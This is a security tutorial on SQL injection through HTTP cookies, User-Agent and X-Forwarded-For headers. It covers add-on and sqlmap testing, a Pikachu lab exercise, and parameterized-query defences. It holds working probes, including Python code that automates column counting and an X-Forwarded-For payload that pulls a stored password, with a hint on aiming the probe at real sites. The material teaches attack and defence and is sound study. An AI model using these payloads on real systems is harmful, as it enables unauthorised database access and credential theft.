SQL injection through HTTP headers

This article describes how to use the Cookies Manager+ and Tamper Data add-ons for SQL injection testing: the X-Forwarded-For and User-Agent request headers as injection points, and SQLi testing by editing cookie values.


Original: http://resources.infosecinstitute.com/sql-injection-http-headers/
[color=blue][b]X-Forwarded-For[/b][/color]
X-Forwarded-For identifies the originating IP address of an HTTP request that has passed through an HTTP proxy or load balancer. It is an ordinary request header, so the client can set it to anything; an application that logs it, or keys a query on it, is handling attacker-controlled input.
[color=blue][b]User-Agent[/b][/color]
User-Agent is used for statistics and for tracing protocol violations. Its value is a sequence of product tokens, each a product name optionally followed by a slash and a version, with the most significant product first.
Not all software records User-Agent data, but some is designed to store it (shopping carts, for example), and stored values normally go through a database query.

[b]Manual testing: using browser add-ons[/b]
(Cookies Manager+ and Tamper Data are legacy Firefox add-ons; an intercepting proxy such as Burp Suite does the same job in a current browser.)
[color=blue]Cookies Manager+[/color]
Cookies Manager+ lets you view, edit and create cookies. It also shows extra information about each cookie, edits several cookies at once, and backs them up and restores them.
After installing it, open Cookies Manager+ from the Tools menu and pick a cookie variable set by the target
[img]http://dl2.iteye.com/upload/attachment/0101/9044/89735e29-c0b6-3c17-81b4-61a9b088700e.png[/img]
We will edit the language_id variable. To look for SQLi, append a single quote to the end of the language_id value
[img]http://dl2.iteye.com/upload/attachment/0101/9046/4459c410-3f6b-394c-bad9-adbf7ecdd759.png[/img]
Then refresh the page or click another internal link of the web application. The application submits the edited cookie and the result is a SQL error. (This detection step relies on the application showing database errors; if it hides them, compare the responses for a true and a false condition instead.)
[img]http://dl2.iteye.com/upload/attachment/0101/9048/fa4dc598-e523-3a1f-9098-9db0f61da69f.png[/img]
[color=blue]Tamper Data:[/color]
After installing it, open Tamper Data from the Tools menu and click Start Tamper to begin tampering
When a request is sent to the target, Tamper Data pops up a dialog asking whether we want to tamper with it:
[img]http://dl2.iteye.com/upload/attachment/0101/9050/519ceade-0496-35f5-a75b-4af47eb2bdda.png[/img]
Click Tamper, as shown below
[img]http://dl2.iteye.com/upload/attachment/0101/9060/5327eebd-0f27-3d77-989e-d3880456d582.png[/img]
As shown above, we append order by 4 to the cookie variable and the response is normal
[img]http://dl2.iteye.com/upload/attachment/0101/9068/630053db-7de3-3437-b6c5-b2ce9e0cfd19.png[/img]
With order by 5 the response is:
[img]http://dl2.iteye.com/upload/attachment/0101/9072/c2709f30-1b8a-3931-b787-a10727696cb1.png[/img]
So we can infer that the query selects 4 columns
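The single-quote and order by probes above, as an added Python example that is not part of the original article: the target application is replaced by a constructed in-memory SQLite table (a four-column language table, queried with the cookie value pasted straight into the WHERE clause), and the two probe functions implement the manual steps as an automatic oracle. The table name, its columns and the row data are assumptions made for the demo.

```python
import sqlite3

# Constructed stand-in for the target application: a table with four columns,
# queried with the language_id cookie value pasted straight into the SQL text.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE languages(id INTEGER, code TEXT, name TEXT, enabled INTEGER);
INSERT INTO languages VALUES (1, 'en', 'English', 1), (2, 'fr', 'French', 1);
""")


def vulnerable_page(language_id: str) -> tuple:
    """Simulates the application. Returns (ok, rows); ok is False when the
    database raised an error, which is the SQL error page seen above."""
    sql = f"SELECT id, code, name, enabled FROM languages WHERE id = {language_id}"
    try:
        return True, _conn.execute(sql).fetchall()
    except sqlite3.Error:
        return False, []


def probe_single_quote(base_value: str) -> bool:
    """Step 1 of the manual test: the clean value works, the value with a
    trailing single quote breaks the query -> the cookie reaches SQL unquoted."""
    ok_clean, _ = vulnerable_page(base_value)
    ok_quote, _ = vulnerable_page(base_value + "'")
    return ok_clean and not ok_quote


def count_columns(base_value: str, max_columns: int = 50) -> int:
    """Step 2: raise ORDER BY n until the query fails. The last n that still
    succeeded is the number of columns the injected SELECT returns."""
    columns = 0
    for n in range(1, max_columns + 1):
        ok, _ = vulnerable_page(f"{base_value} order by {n}")
        if not ok:
            break
        columns = n
    return columns


if __name__ == "__main__":
    print("injectable:", probe_single_quote("1"))
    print("columns:", count_columns("1"))
```

Against a real site the same oracle is the HTTP response: send each payload as the language_id cookie (for example requests.get(url, cookies={"language_id": payload})) and treat an error page, a 500, or a changed page body as the failure signal. Counting with ORDER BY assumes the cookie value lands at the end of the statement; if it sits mid-query, comment out the tail (-- or #) first.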

[color=blue][b]Automated injection with sqlmap:[/b][/color]
By default sqlmap tests all GET/POST parameters. With --level set to 2 or higher it also tests the values in the HTTP Cookie header; with --level 3 or higher it tests the User-Agent and Referer headers as well (the Host header is tested from level 5). X-Forwarded-For is not on this list at any level: to have sqlmap test it, pass the header with --headers and mark the injection point in its value with an asterisk (*), or supply a request file with -r and put the asterisk there.
[table]
|Tested HTTP parameter|Minimum --level|
|GET|1 (default)|
|POST|1 (default)|
|HTTP Cookie|2|
|HTTP User-Agent|3|
|HTTP Referer|3|
[/table]
[b]Pikachu framework: HTTP header injection module[/b]
Web applications often read client information from request headers such as User-Agent, Accept, or custom-defined fields. When backend code puts those header values into SQL without proper handling, the result is SQL injection. The Pikachu training platform demonstrates this in a module built for that purpose.
To reproduce it on Pikachu:
- Open the Http Header Injection module.
- Click the hint button to obtain the login credentials.
- Log in with them, then intercept the next GET request with Burp Suite.
- Modify the request headers that the server-side code processes unsafely, using the same single-quote and order by probes as for the cookie above.
[b]Mitigation[/b]
Preventing header-based SQL injection comes down to a few practices:
- Validate all input before processing it.
- Use prepared statements (parameterized queries) for every database call; this is the primary control.
- Sanitize user-supplied data as a secondary measure, not as a substitute for parameterization, since blacklisting characters is easy to bypass.
Instead of embedding variables in the query string, use the parameter binding supported by every modern database API:
```sql
SELECT * FROM users WHERE username = ? AND password = ?
```
Bound parameters are sent to the database separately from the statement text, so even crafted input cannot change the structure of the intended command.
[b]Further measures[/b]
Beyond coding standards, additional layers help against attacks that exploit weak handling of HTTP headers:
- Regular security audits and penetration tests to find weaknesses early.
- Regular secure-programming training for development teams.
- Prompt patching of software with known issues.
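The User-Agent/X-Forwarded-For logging case described at the top of the article and the parameterized-query mitigation above, as one added Python example that is neither the article's nor Pikachu's code: a constructed SQLite visits log written once by string formatting (injectable through both headers) and once with bound parameters, plus a client_ip helper that validates X-Forwarded-For before trusting it. The table layout, the users table, the peer address and the header values are all assumptions made for the demo.

```python
import ipaddress
import sqlite3


def _fresh_db() -> sqlite3.Connection:
    """Constructed fixture: a visits log like the shopping-cart case, plus a
    users table so an injected subquery has something to read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits(ip TEXT, user_agent TEXT)")
    conn.execute("CREATE TABLE users(name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def log_visit_vulnerable(conn: sqlite3.Connection, headers: dict) -> None:
    """Header values are pasted into the SQL text. X-Forwarded-For and
    User-Agent are both attacker-controlled, so this INSERT is injectable."""
    ip = headers.get("X-Forwarded-For", headers["Remote-Addr"])
    ua = headers.get("User-Agent", "")
    conn.execute(f"INSERT INTO visits(ip, user_agent) VALUES ('{ip}', '{ua}')")


def client_ip(headers: dict) -> str:
    """Hardened X-Forwarded-For handling: take the first hop, require it to
    parse as an IP address, otherwise fall back to the socket peer address."""
    first_hop = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        return headers["Remote-Addr"]


def log_visit_safe(conn: sqlite3.Connection, headers: dict) -> None:
    """Same write with bound parameters: the driver passes the values separately
    from the statement, so quotes and comments in a header cannot alter it."""
    conn.execute(
        "INSERT INTO visits(ip, user_agent) VALUES (?, ?)",
        (client_ip(headers), headers.get("User-Agent", "")),
    )


def submit(log_func, headers: dict) -> tuple:
    """Run one request against a fresh database. Returns (ok, stored_rows);
    ok is False when the database raised, i.e. the SQL error page case."""
    conn = _fresh_db()
    try:
        log_func(conn, headers)
    except sqlite3.Error:
        return False, []
    return True, conn.execute("SELECT ip, user_agent FROM visits").fetchall()


def request_headers(extra: dict = None) -> dict:
    """Constructed request: the peer address plus whatever the test overrides."""
    headers = {"Remote-Addr": "203.0.113.9", "User-Agent": "Mozilla/5.0"}
    headers.update(extra or {})
    return headers


# The single-quote probe from the manual test: breaks the vulnerable query,
# is stored as plain text by the safe one.
QUOTE_PROBE = request_headers({"User-Agent": "Mozilla/5.0'"})

# Reading the users table through X-Forwarded-For: closes the ip literal,
# supplies a subquery as the user_agent column, comments out the rest.
XFF_EXFIL = request_headers({"X-Forwarded-For": "1.1.1.1', (SELECT password FROM users))--"})


if __name__ == "__main__":
    for name, func in (("vulnerable", log_visit_vulnerable), ("safe", log_visit_safe)):
        print(name, "quote probe:", submit(func, QUOTE_PROBE))
        print(name, "xff exfil:  ", submit(func, XFF_EXFIL))
```

With the vulnerable writer the quote probe produces a database error and the X-Forwarded-For payload stores the admin password in the user_agent column of the visits log; with bound parameters both requests are stored literally, and the forged X-Forwarded-For is discarded in favour of the peer address because it does not parse as an IP.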